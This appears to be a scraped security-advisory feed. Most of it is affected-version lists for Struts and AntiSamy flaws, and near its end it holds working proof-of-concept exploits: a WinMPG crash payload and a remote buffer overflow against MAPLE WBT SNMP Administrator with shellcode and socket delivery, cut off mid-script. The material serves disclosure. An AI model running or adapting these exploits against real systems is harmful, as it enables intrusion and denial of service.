Hitachi Tuning Manager Software 7.4.0-01 (Windows)
Hitachi Tuning Manager Software 7.4.0-01 (Solaris(SP
Hitachi Tuning Manager Software 7.4.0-01 (Linux)
Hitachi Tuning Manager Software 7.2.1-00
Hitachi Tuning Manager Software 7.1.0-00 (Windows)
Hitachi Tuning Manager Software 7.1.0 (Linux)
Hitachi Tuning Manager Software 7.0.0-00
Hitachi Tuning Manager Software 6.4.0-03 (Windows)
Hitachi Tuning Manager Software 6.4.0-03 (Solaris(SP
Hitachi Tuning Manager Software 6.0.0 (Solaris)
Hitachi Tuning Manager Software 3.5.0 (windows)
Hitachi Tiered Storage Manager Software 7.3 -00 (Windows)
Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(x64))
Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(SLES))
Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(RHEL))
Hitachi Tiered Storage Manager Software 7.1.1 -00(Windows)
Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(x64))
Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(SPARC))
Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(SLES))
Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(RHEL))
Hitachi Tiered Storage Manager Software 7.0 -00 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.2 -01 (Windows)
Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.2 -01 (Linux)
Hitachi Tiered Storage Manager Software 6.2 -00 (Windows)
Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.2 -00 (Linux)
Hitachi Tiered Storage Manager Software 6.1.1 -01 (Windows)
Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.1.1 -01 (Linux)
Hitachi Tiered Storage Manager Software 6.1.1 -00 (Windows)
Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.1.1 -00 (Linux)
Hitachi Tiered Storage Manager Software 6.1 -01 (Windows)
Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.1 -01 (Linux)
Hitachi Tiered Storage Manager Software 6.1 -00 (Windows)
Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(x64))
Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(SPARC))
Hitachi Tiered Storage Manager Software 6.1 -00 (Linux)
Hitachi Tiered Storage Manager Software 8.0.0-05 (Windows)
Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(SuSE
Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(RHEL
Hitachi Tiered Storage Manager Software 8.0.0-00 (Windows)
Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(SuSE
Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(RHEL
Hitachi Tiered Storage Manager Software 7.6.1-05 (Windows)
Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(x6
Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(SP
Hitachi Tiered Storage Manager Software 7.6.1-05 (Linux(RHEL
Hitachi Tiered Storage Manager Software 7.5.0-02
Hitachi Tiered Storage Manager Software 7.2.1-00
Hitachi Tiered Storage Manager Software 7.1.1-00
Hitachi Tiered Storage Manager Software 7.1.0-00 (Windows)
Hitachi Tiered Storage Manager Software 7.1.0-00 (Solaris(SP
Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(SLES
Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(RHEL
Hitachi Tiered Storage Manager Software 7.0.1-02 (Windows)
Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(SLES
Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(RHEL
Hitachi Tiered Storage Manager Software 7.0.0-00 (Windows)
Hitachi Tiered Storage Manager Software 7.0.0-00 (Solaris(SP
Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(SLES
Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(RHEL
Hitachi Tiered Storage Manager Software 6.4.0-08 (Windows)
Hitachi Tiered Storage Manager Software 6.4.0-08 (Solaris(SP
Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(SLES
Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(RHEL
Hitachi Tiered Storage Manager Software 6.4.0-07 (Windows)
Hitachi Tiered Storage Manager Software 6.4.0-07 (Solaris(SP
Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(SLES
Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(RHEL
Hitachi Tiered Storage Manager Software 6.3.0-00 (linux(SLES
Hitachi Tiered Storage Manager Software 6.2.0-00 (Linux(RHEL
Hitachi Tiered Storage Manager Software 6.0.0-00 (Windows)
Hitachi Tiered Storage Manager Software 6.0.0-00 (Solaris(SP
Hitachi Tiered Storage Manager Software 0
Hitachi Raplication Manager Software 8.0.0-05 (Linux(RHEL
Hitachi Raplication Manager Software 8.0.0-00 (Linux(SuSE
Hitachi Raplication Manager Software 8.0.0-00 (Linux(RHEL
Hitachi Raplication Manager Software 7.6.1-05 (Windows)
Hitachi Raplication Manager Software 7.6.1-05 (Solaris(x6
Hitachi Raplication Manager Software 7.6.1-05 (Solaris(SP
Hitachi Raplication Manager Software 7.6.1-05 (Linux(RHEL
Hitachi JP1/Performance Management - Web Console 10-00-03 (Windows)
Hitachi JP1/Performance Management - Web Console 10-00-03 (Solaris)
Hitachi JP1/Performance Management - Web Console 10-00-03 (Linux)
Hitachi JP1/Performance Management - Web Console 10-00-03 (HP-UX)
Hitachi JP1/Performance Management - Web Console 10-00-03 (AIX)
Hitachi JP1/Performance Management - Web Console 10-00-00 (Windows)
Hitachi JP1/Performance Management - Web Console 10-00-00 (Solaris)
Hitachi JP1/Performance Management - Web Console 10-00-00 (Linux)
Hitachi JP1/Performance Management - Web Console 10-00-00 (HP-UX)
Hitachi JP1/Performance Management - Web Console 10-00-00 (AIX)
Hitachi JP1/Performance Management - Web Console 09-50-03 (Windows)
Hitachi JP1/Performance Management - Web Console 09-50-03 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-50-03 (Linux)
Hitachi JP1/Performance Management - Web Console 09-50-03 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-50-03 (AIX)
Hitachi JP1/Performance Management - Web Console 09-50-00 (Windows)
Hitachi JP1/Performance Management - Web Console 09-50-00 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-50-00 (Linux)
Hitachi JP1/Performance Management - Web Console 09-50-00 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-50-00 (AIX)
Hitachi JP1/Performance Management - Web Console 09-10-10 (Windows)
Hitachi JP1/Performance Management - Web Console 09-10-10 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-10-10 (Linux)
Hitachi JP1/Performance Management - Web Console 09-10-10 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-10-10 (AIX)
Hitachi JP1/Performance Management - Web Console 09-10-03
Hitachi JP1/Performance Management - Web Console 09-10-00 (Windows)
Hitachi JP1/Performance Management - Web Console 09-10-00 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-10-00 (Linux)
Hitachi JP1/Performance Management - Web Console 09-10-00 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-10-00 (AIX)
Hitachi JP1/Performance Management - Web Console 09-10
Hitachi JP1/Performance Management - Web Console 09-00-12 (Windows)
Hitachi JP1/Performance Management - Web Console 09-00-12 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-00-12 (Linux)
Hitachi JP1/Performance Management - Web Console 09-00-12 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-00-12 (AIX)
Hitachi JP1/Performance Management - Web Console 09-00-08
Hitachi JP1/Performance Management - Web Console 09-00-07
Hitachi JP1/Performance Management - Web Console 09-00-02
Hitachi JP1/Performance Management - Web Console 09-00-01
Hitachi JP1/Performance Management - Web Console 09-00-00 (Windows)
Hitachi JP1/Performance Management - Web Console 09-00-00 (Solaris)
Hitachi JP1/Performance Management - Web Console 09-00-00 (Linux)
Hitachi JP1/Performance Management - Web Console 09-00-00 (HP-UX)
Hitachi JP1/Performance Management - Web Console 09-00-00 (AIX)
Hitachi JP1/Performance Management - Web Console 09-00-00
Hitachi JP1/Performance Management - Web Console 09-00
Hitachi JP1/Performance Management - Web Console 08-50-13 (Windows)
Hitachi JP1/Performance Management - Web Console 08-50-13 (Solaris)
Hitachi JP1/Performance Management - Web Console 08-50-13 (Linux)
Hitachi JP1/Performance Management - Web Console 08-50-13 (HP-UX)
Hitachi JP1/Performance Management - Web Console 08-50-13 (AIX)
Hitachi JP1/Performance Management - Web Console 08-50-09
Hitachi JP1/Performance Management - Web Console 08-50-00 (Windows)
Hitachi JP1/Performance Management - Web Console 08-50-00 (Solaris)
Hitachi JP1/Performance Management - Web Console 08-50-00 (Linux)
Hitachi JP1/Performance Management - Web Console 08-50-00 (HP-UX)
Hitachi JP1/Performance Management - Web Console 08-50-00 (AIX)
Hitachi JP1/Performance Management - Web Console 08-50
Hitachi JP1/Performance Management - Web Console 08-11-08 (Windows)
Hitachi JP1/Performance Management - Web Console 08-11-08 (Linux)
Hitachi JP1/Performance Management - Web Console 08-11-07
Hitachi JP1/Performance Management - Web Console 08-11-01
Hitachi JP1/Performance Management - Web Console 08-11-00 (Windows)
Hitachi JP1/Performance Management - Web Console 08-11-00 (Linux)
Hitachi JP1/Performance Management - Web Console 08-11-00
Hitachi JP1/Performance Management - Web Console 08-11
Hitachi JP1/Performance Management - Web Console 08-10-08 (Windows)
Hitachi JP1/Performance Management - Web Console 08-10-08 (Linux)
Hitachi JP1/Performance Management - Web Console 08-10-07
Hitachi JP1/Performance Management - Web Console 08-10-00 (Windows)
Hitachi JP1/Performance Management - Web Console 08-10-00 (Linux)
Hitachi JP1/Performance Management - Web Console 08-10
Hitachi JP1/Performance Management - Web Console 08-00-12 (Windows)
Hitachi JP1/Performance Management - Web Console 08-00-12 (Linux)
Hitachi JP1/Performance Management - Web Console 08-00-11
Hitachi JP1/Performance Management - Web Console 08-00-03
Hitachi JP1/Performance Management - Web Console 08-00-02
Hitachi JP1/Performance Management - Web Console 08-00-00 (Windows)
Hitachi JP1/Performance Management - Web Console 08-00-00 (Linux)
Hitachi JP1/Performance Management - Web Console 08-00-00
Hitachi JP1/Performance Management - Web Console 08-00
Hitachi JP1/Performance Management - Web Console 0
Hitachi JP1/Performance Management - Manager Web Option 07-54 (Windows)
Hitachi JP1/Performance Management - Manager Web Option 07-54 (Solaris)
Hitachi JP1/Performance Management - Manager Web Option 07-00 (Windows)
Hitachi JP1/Performance Management - Manager Web Option 07-00 (Solaris)
Hitachi Job Management Partner 1/Performance Management - Web Console 0
Hitachi Global Link Manager Software 6.6 -00 (Windows)
Hitachi Global Link Manager Software 6.5 -00 (Windows)
Hitachi Global Link Manager Software 6.2 -01 (Windows)
Hitachi Global Link Manager Software 6.2 -00 (Windows)
Hitachi Global Link Manager Software 6.1 -01 (Windows)
Hitachi Global Link Manager Software 6.1 -00 (Windows)
Hitachi Global Link Manager Software 8.0.0-00 (Windows)
Hitachi Global Link Manager Software 8.0.0-00 (Linux(SuSE
Hitachi Global Link Manager Software 8.0.0-00 (Linux(RHEL
Hitachi Global Link Manager Software 7.6.1-01 (Windows)
Hitachi Global Link Manager Software 7.6.1-01 (Solaris(x6
Hitachi Global Link Manager Software 7.6.1-01 (Solaris(SP
Hitachi Global Link Manager Software 7.6.1-01 (Linux(RHEL
Hitachi Device Manager Software 7.4 -00 (Windows)
Hitachi Device Manager Software 7.4 -00 (Solaris(SPARC))
Hitachi Device Manager Software 7.4 -00 (Linux(SLES))
Hitachi Device Manager Software 7.4 -00 (Linux(RHEL))
Hitachi Device Manager Software 7.3 -00(Solaris(x64))
Hitachi Device Manager Software 7.3 -00(Solaris(SPARC))
Hitachi Device Manager Software 7.3 -00(Linux(SLES))
Hitachi Device Manager Software 7.3 -00 (Windows)
Hitachi Device Manager Software 7.3 -00 (Linux(RHEL))
Hitachi Device Manager Software 7.0 -00 (Solaris(x64))
Hitachi Device Manager Software 6.2 -02 (Windows)
Hitachi Device Manager Software 6.2 -02 (Solaris(x64))
Hitachi Device Manager Software 6.2 -02 (Solaris(SPARC))
Hitachi Device Manager Software 6.2 -02 (Linux)
Hitachi Device Manager Software 6.2 -01 (Windows)
Hitachi Device Manager Software 6.2 -01 (Solaris(x64))
Hitachi Device Manager Software 6.2 -01 (Solaris(SPARC))
Hitachi Device Manager Software 6.2 -01 (Linux)
Hitachi Device Manager Software 6.2 -00 (Windows)
Hitachi Device Manager Software 6.2 -00 (Solaris(x64))
Hitachi Device Manager Software 6.2 -00 (Solaris(SPARC))
Hitachi Device Manager Software 6.2 -00 (Solaris (x64))
Hitachi Device Manager Software 6.2 -00 (Linux)
Hitachi Device Manager Software 6.1.1 -04 (Windows)
Hitachi Device Manager Software 6.1.1 -04 (Solaris(x64))
Hitachi Device Manager Software 6.1.1 -04 (Solaris(SPARC))
Hitachi Device Manager Software 6.1.1 -04 (Solaris (x64))
Hitachi Device Manager Software 6.1.1 -04 (Linux)
Hitachi Device Manager Software 6.1.1 -03 (Windows)
Hitachi Device Manager Software 6.1.1 -03 (Solaris(SPARC))
Hitachi Device Manager Software 6.1.1 -03 (Solaris (x64))
Hitachi Device Manager Software 6.1.1 -03 (Linux)
Hitachi Device Manager Software 6.1.1 -00 (Windows)
Hitachi Device Manager Software 6.1.1 -00 (Solaris(x64))
Hitachi Device Manager Software 6.1.1 -00 (Solaris(SPARC))
Hitachi Device Manager Software 6.1.1 -00 (Solaris (x64))
Hitachi Device Manager Software 6.1.1 -00 (Linux)
Hitachi Device Manager Software 6.1 -03 (Windows)
Hitachi Device Manager Software 6.1 -03 (Solaris(SPARC))
Hitachi Device Manager Software 6.1 -03 (Solaris (x64))
Hitachi Device Manager Software 6.1 -03 (Linux)
Hitachi Device Manager Software 6.1 -02 (Windows)
Hitachi Device Manager Software 6.1 -02 (Solaris(x64))
Hitachi Device Manager Software 6.1 -02 (Solaris(SPARC))
Hitachi Device Manager Software 6.1 -02 (Solaris (x64))
Hitachi Device Manager Software 6.1 -02 (Linux)
Hitachi Device Manager Software 6.1 -00 (Windows)
Hitachi Device Manager Software 6.1 -00 (Solaris(x64))
Hitachi Device Manager Software 6.1 -00 (Solaris(SPARC))
Hitachi Device Manager Software 6.1 -00 (Solaris (x64))
Hitachi Device Manager Software 6.1 -00 (Linux)
Hitachi Device Manager Software 6.0 -06 (Windows)
Hitachi Device Manager Software 6.0 -06 (Solaris(SPARC))
Hitachi Device Manager Software 6.0 -06 (Solaris (x64))
Hitachi Device Manager Software 6.0 -06 (Linux)
Hitachi Device Manager Software 6.0 -00 (Windows)
Hitachi Device Manager Software 6.0 -00 (Solaris(SPARC))
Hitachi Device Manager Software 6.0 -00 (Solaris (x64))
Hitachi Device Manager Software 6.0 -00 (Linux)
Hitachi Device Manager Software 8.0.0-05 (Windows)
Hitachi Device Manager Software 8.0.0-05 (Linux(SuSE
Hitachi Device Manager Software 8.0.0-05 (Linux(RHEL
Hitachi Device Manager Software 8.0.0-00 (Windows)
Hitachi Device Manager Software 8.0.0-00 (Linux(SuSE
Hitachi Device Manager Software 8.0.0-00 (Linux(RHEL
Hitachi Device Manager Software 7.6.1-05 (Windows)
Hitachi Device Manager Software 7.6.1-05 (Solaris(x6
Hitachi Device Manager Software 7.6.1-05 (Solaris(SP
Hitachi Device Manager Software 7.6.1-05 (Linux(SuSE
Hitachi Device Manager Software 7.6.1-05 (Linux(RHEL
Hitachi Device Manager Software 7.5.0-02
Hitachi Device Manager Software 7.4.0-00 (Solaris(Op
Hitachi Device Manager Software 7.3.1 (windows)
Hitachi Device Manager Software 7.2.1-01
Hitachi Device Manager Software 7.2.1-00
Hitachi Device Manager Software 7.1.0-00 (Windows)
Hitachi Device Manager Software 7.1.0-00 (Solaris(SP
Hitachi Device Manager Software 7.1.0-00 (Linux(SLES
Hitachi Device Manager Software 7.1.0-00 (Linux(RHEL
Hitachi Device Manager Software 7.0.1-02 (Windows)
Hitachi Device Manager Software 7.0.1-02 (linux(SLES
Hitachi Device Manager Software 7.0.1-02 (linux(RHEL
Hitachi Device Manager Software 7.0.0-00 (Windows)
Hitachi Device Manager Software 7.0.0-00 (Solaris(SP
Hitachi Device Manager Software 7.0.0-00 (linux(SLES
Hitachi Device Manager Software 7.0.0-00 (linux(RHEL
Hitachi Device Manager Software 7.0.0-00
Hitachi Device Manager Software 6.4.0-08 (Windows)
Hitachi Device Manager Software 6.4.0-08 (Solaris(SP
Hitachi Device Manager Software 6.4.0-08 (Linux(SLES
Hitachi Device Manager Software 6.4.0-08 (Linux(RHEL
Hitachi Device Manager Software 6.4.0-07 (Windows)
Hitachi Device Manager Software 6.4.0-07 (Solaris(SP
Hitachi Device Manager Software 6.4.0-07 (linux(SLES
Hitachi Device Manager Software 6.4.0-07 (linux(RHEL
Hitachi Device Manager Software 6.3.0-00 (linux(SLES
F5 BIG-IP WebAccelerator 11.2.0 0
F5 BIG-IP WebAccelerator 11.3
F5 BIG-IP WebAccelerator 11.2.1 HF3
F5 BIG-IP WebAccelerator 11.2.1
F5 BIG-IP WebAccelerator 11.2 HF3
F5 BIG-IP WebAccelerator 11.1
F5 BIG-IP WebAccelerator 11.0
F5 BIG-IP WebAccelerator 10.2.4
F5 BIG-IP WebAccelerator 10.2.1
F5 BIG-IP WebAccelerator 10.0
F5 BIG-IP WebAccelerator 11.2.1 HF5
F5 BIG-IP WebAccelerator 11.2.0 HF5
F5 BIG-IP WebAccelerator 11.1.0 HF7
F5 BIG-IP WebAccelerator 10.2.1 HF1
F5 BIG-IP Edge Gateway 11.3
F5 BIG-IP Edge Gateway 11.2.1 HF3
F5 BIG-IP Edge Gateway 11.2.1
F5 BIG-IP Edge Gateway 11.2 HF3
F5 BIG-IP Edge Gateway 11.2
F5 BIG-IP Edge Gateway 11.1
F5 BIG-IP Edge Gateway 11.0
F5 BIG-IP Edge Gateway 10.2.4
F5 BIG-IP Edge Gateway 10.2.2
F5 BIG-IP Edge Gateway 10.2.1
F5 BIG-IP Edge Gateway 11.2.1 HF5
F5 BIG-IP Edge Gateway 11.2.1 HF2
F5 BIG-IP Edge Gateway 11.2.0 HF5
F5 BIG-IP Edge Gateway 11.1.0 HF7
F5 BIG-IP Edge Gateway 10.2.1 HF1
F5 BIG-IP Edge Gateway 10.1
F5 BIG-IP AAM 11.5.1
F5 BIG-IP AAM 11.5
F5 BIG-IP AAM 11.4.1
F5 BIG-IP AAM 11.4.0
F5 ARX 6.4
F5 ARX 6.3
F5 ARX 6.2
F5 ARX 6.1.1
F5 ARX 6.1
F5 ARX 6.0
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
CentOS CentOS 5
Apache Struts 1.3.10
Apache Struts 1.3.8
Apache Struts 1.3.5
Apache Struts 1.2.9
Apache Struts 1.2.8
Apache Struts 1.2.7
Apache Struts 1.2.4
Apache Struts 1.1
Apache Struts 1.0.2
Apache Struts 1.2.6
Apache Struts 1.2.2

Not Vulnerable: VMWare vCenter Server 5.5 Update 2
NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0.5.2
Juniper Security Threat Response Manager 2013.2R8
Juniper Security Threat Response Manager 2012.1R7
Juniper Secure Analytics 2014.2R2
Juniper Secure Analytics 2013.2R8
Juniper Secure Analytics 2012.1R7
HP SiteScope 11.24.271
HP SiteScope 11.13
Hitachi Tuning Manager Software 8.0.0-06 (Windows)
Hitachi Tuning Manager Software 8.0.0-06 (Linux(SuSE
Hitachi Tuning Manager Software 8.0.0-06 (Linux(RHEL
Hitachi Tiered Storage Manager Software 8.0.0-06 (Windows)
Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(SuSE
Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(RHEL
Hitachi Raplication Manager Software 8.0.0-06 (Linux(SuSE
Hitachi Raplication Manager Software 8.0.0-06 (Linux(RHEL
Hitachi Global Link Manager Software 8.0.0-01 (Linux(SuSE
Hitachi Global Link Manager Software 8.0.0-01 (Linux(RHEL
Hitachi Device Manager Software 8.0.0-06 (Windows)
Hitachi Device Manager Software 8.0.0-06 (Linux(SuSE
Hitachi Device Manager Software 8.0.0-06 (Linux(RHEL
Apache Struts 2.3.16.2

Exploit

Attackers can use readily available tools to exploit this issue.

References:

Source:www.securityfocus.com

↧

OWASP AntiSamy CVE-2017-14735 Cross Site Scripting Vulnerability

July 17, 2019, 1:08 am

≫ Next: WinMPG iPod Convert 3.0 Denial Of Service

≪ Previous: Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability

OWASP AntiSamy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Versions prior to OWASP AntiSamy prior to1.5.7 are vulnerable.

Information

Bugtraq ID: 105656
Class: Input Validation Error
CVE: CVE-2017-14735

Remote: Yes
Local: No
Published: Sep 25 2017 12:00AM
Updated: Jul 17 2019 07:00AM
Credit: Raj Veerappan
Vulnerable: Oracle WebCenter Sites 11.1.1 8.0
Oracle Retail Returns Management 14.1
Oracle Retail Returns Management 14.0
Oracle Retail Returns Management 13.4
Oracle Retail Returns Management 13.3
Oracle Retail Central Office 14.1
Oracle Retail Central Office 14.0
Oracle Retail Central Office 13.4
Oracle Retail Central Office 13.3
Oracle Retail Back Office 14.1
Oracle Retail Back Office 14.0
Oracle Retail Back Office 13.4
Oracle Retail Back Office 13.3
Oracle Insurance Policy Administration J2EE 10.2
Oracle Insurance Policy Administration J2EE 10.0
Oracle Insurance Calculation Engine 9.7
Oracle Insurance Calculation Engine 10.2
Oracle Insurance Calculation Engine 10.1
Oracle Insurance Calculation Engine 10.0
Oracle Fusion Middleware MapViewer 12.2.1.3.0
Oracle Fusion Middleware MapViewer 12.1.3.0
Oracle FLEXCUBE Core Banking 11.8
Oracle FLEXCUBE Core Banking 11.7
Oracle FLEXCUBE Core Banking 11.6
Oracle FLEXCUBE Core Banking 5.2
Oracle Banking Platform 2.6.1
Oracle Banking Platform 2.6
Oracle Banking Platform 2.5.0
Oracle Agile PLM 9.3.5
Oracle Agile PLM 9.3.4
Antisamy Project Antisamy 1.5.6
Antisamy Project Antisamy 1.5.4
Antisamy Project Antisamy 1.5.3
Antisamy Project Antisamy 1.5.1
Antisamy Project Antisamy 1.4.4

Not Vulnerable: Antisamy Project Antisamy 1.5.7

Exploit

An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.

References:

[owasp-antisamy] AntiSamy 1.5.7 released (OWASP)
Support HTML5 #10 (Nahsra)
Merging 1.5.7 (#16) (Nahsra)
Oracle Critical Patch Update Advisory - January 2019 (Oracle)
Oracle Critical Patch Update Advisory - July 2019 (Oracle)
Oracle Critical Patch Update Advisory - October 2018 (Oracle)
OWASP AntiSamy Homepage (OWASP)

Source:www.securityfocus.com

↧

WinMPG iPod Convert 3.0 Denial Of Service

July 17, 2019, 11:52 am

≫ Next: MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

≪ Previous: OWASP AntiSamy CVE-2017-14735 Cross Site Scripting Vulnerability

WinMPG iPod Convert version 3.0 Register flow denial of service proof of concept exploit.

MD5 | bee17e5fa15fbe4821c7b222ab4fad83

Download

# Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
# Date: 2019-07-16
# Vendor Homepage:http://www.winmpg.com
# Software Link:  https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
# Exploit Author: stresser
# Tested Version: 3.0
# Tested on: Windows XP SP3 EN


# 1.- Run python code :WinMPG.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open WinMPG and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
# 5.- Click 'Ok'and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
  f=open("Evil.txt","w")
  print "[+] Creating %s bytes evil payload.." %len(buffer)
  f.write(buffer)
  f.close()
  print "[+] File created!"
except:
  print "File cannot be created"

Source:packetstormsecurity.com

↧

MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

July 17, 2019, 11:53 am

≫ Next: Oracle Siebel CRM 19.0 Cross Site Scripting

≪ Previous: WinMPG iPod Convert 3.0 Denial Of Service

MAPLE Computer WBT SNMP Administrator version 2.0.195.15 suffers from a buffer overflow vulnerability that allows for code execution.

MD5 | a6d1442ffd46e1f782c5c9c9d20d026e

Download

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security        


[Vendor]
www.computerlab.com


[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
Agents are built into the clients for remote management and configuration.


[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day


[CVE Reference]
CVE-2019-13577


[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
This will overwrite data on the stack/registers and allow for control of the programs execution flow resulting in attacker supplied remote code execution.
Authentication is not required for this exploit.

This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
When installing the vulnerable program if asks for a serial number just enter a value of "1" or something.
Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.

e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR / SEH all set to False helping to make exploit more portable. 

CALL EBX
10008FB3   0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)



[Exploit/POC]
from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack("<L", 0x10008fb3)      #JMP EBX
popebx = struct.pack("<L", 0x022C0012)   #5B POP EBX

buf0="B"*693704 
buf1=eip
buf2=popebx+sc+"R"*899+"W"*23975 
payload=buf0+buf1+buf2

def doit(IP,payload):
    try:
        s=socket(AF_INET, SOCK_STREAM)        
        s.connect((IP, 987))
        s.send(payload)
        print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
        print "hyp3rlinx"
        s.close()
    except Exception as e:
        print str(e)

